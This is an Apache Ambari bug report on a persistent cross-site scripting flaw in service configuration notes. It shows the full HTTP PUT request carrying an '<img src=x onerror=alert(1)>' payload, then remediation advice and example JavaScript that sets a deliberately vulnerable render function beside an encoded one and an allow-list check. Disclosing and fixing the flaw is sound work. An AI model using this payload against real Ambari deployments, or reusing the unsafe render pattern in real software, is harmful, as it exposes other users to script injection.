AMBARI-25287: Persistent Cross Site Scripting (XSS) in Ambari


    Details

    • Type: Bug
    • Status: Resolved
    • Priority: Critical
    • Resolution: Fixed
    • Affects Version/s: 2.6.2
    • Fix Version/s: None
    • Component/s: ambari-web

      Description

      Below is the HTTP request issued when a user submits a configuration note containing JavaScript
      after modifying some configuration in the "Tez" service. Because the note is stored with the service
      configuration version and rendered in the web UI, the script runs for any user who later views that
      version (persistent XSS).
      HTTP Request:
      PUT /api/v1/clusters/<env> HTTP/1.1
      Host: xyz601:8080
      Content-Length: 199
      Accept: application/json, text/javascript, */*; q=0.01
      Origin: http://xyz601:8080
      X-Requested-With: XMLHttpRequest
      X-Requested-By: X-Requested-By
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
      Content-Type: application/x-www-form-urlencoded; charset=UTF-8
      Referer: http://xyz:8080/
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Cookie: AMBARISESSIONID=vfiy4336mxwl1k5ehd6jrz43i
      Connection: close

      {"Clusters":{"desired_service_config_versions":{"service_config_version":4,"service_name":"TEZ","service_config_version_note":"Created from service config version V4\n<img src=x onerror=alert(1)>"}}}

      Remediation Recommendations
      Restrict all input passed to the application to valid, whitelisted content, and ensure that all
      response/output sent by the server is HTML, URL or JavaScript encoded, depending on the context in
      which the data is used by the application.
      The remediation should not attempt to blacklist content and remove, filter, or sanitize it: there are
      too many alternative encodings of such content that can be used to get around filters.
      We strongly recommend a positive security policy that specifies what is allowed.
      Negative or attack-signature-based policies are difficult to maintain and are likely to be incomplete.
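      The following is an added example, not Ambari's code, showing the two halves of the recommendation
      above applied to the service_config_version_note from the request: the vulnerable string-concatenation
      render beside a context-aware HTML-encoded render, plus an allow-list check for the note on the API
      side. Function names (renderNoteUnsafe, renderNoteSafe, escapeHtml, isValidNote, containsLiveMarkup)
      and the 1000-character cap are assumptions for illustration; the payload string is the one from the
      PUT body.

```javascript
// Added example (not Ambari's code). Shows why output encoding, not filtering,
// fixes the stored XSS in a configuration note. Helper names are hypothetical.

// Entity-encode for an HTML text context. Only these five characters can break
// out of text content; encoding them is complete for this context, while a
// blacklist of tags or "onerror" would be bypassable via alternative encodings.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable pattern: the stored note is concatenated straight into markup, so
// an <img onerror=...> inside it becomes a live element for every viewer.
function renderNoteUnsafe(note) {
  return '<div class="note">' + note + '</div>';
}

// Hardened pattern: encode for the exact context the note lands in (HTML text).
// A note placed in an attribute or inside a <script> would need a different encoder.
function renderNoteSafe(note) {
  return '<div class="note">' + escapeHtml(note) + '</div>';
}

// Positive (allow-list) input check for the API side. A note is free text, so
// letters, digits, punctuation, spaces and newlines are allowed; anything else,
// including the '<', '=' and '>' symbols needed for a tag, is rejected.
// The length cap is an assumed value, not an Ambari limit.
function isValidNote(note, maxLen = 1000) {
  if (typeof note !== 'string' || note.length > maxLen) return false;
  return /^[\p{L}\p{N}\p{P}\p{Zs}\n]*$/u.test(note);
}

// Check used below to show the difference: does the rendered HTML still contain
// an element carrying an inline event-handler attribute?
function containsLiveMarkup(html) {
  return /<\w+[^>]*\son\w+=/i.test(html);
}

// Constructed input: the note from the PUT body in the issue description.
const PAYLOAD_NOTE = 'Created from service config version V4\n<img src=x onerror=alert(1)>';

console.log('unsafe keeps handler:', containsLiveMarkup(renderNoteUnsafe(PAYLOAD_NOTE)));
console.log('safe keeps handler:  ', containsLiveMarkup(renderNoteSafe(PAYLOAD_NOTE)));
console.log('allow-list accepts payload:', isValidNote(PAYLOAD_NOTE));
```

      The allow-list is deliberately strict (it also rejects a legitimate note such as "set x=1"), which is
      the usual trade-off of a positive policy on free text; the encoding step is the one that must never be
      skipped, and in templating engines the unescaped-output helper is the usual place the skip happens.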

      People

      • Assignee: Andrii Tkach (atkach)
      • Reporter: Andrii Tkach (atkach)


      Time Tracking

      • Original Estimate: Not Specified
      • Remaining Estimate: 0h
      • Time Spent: 0.5h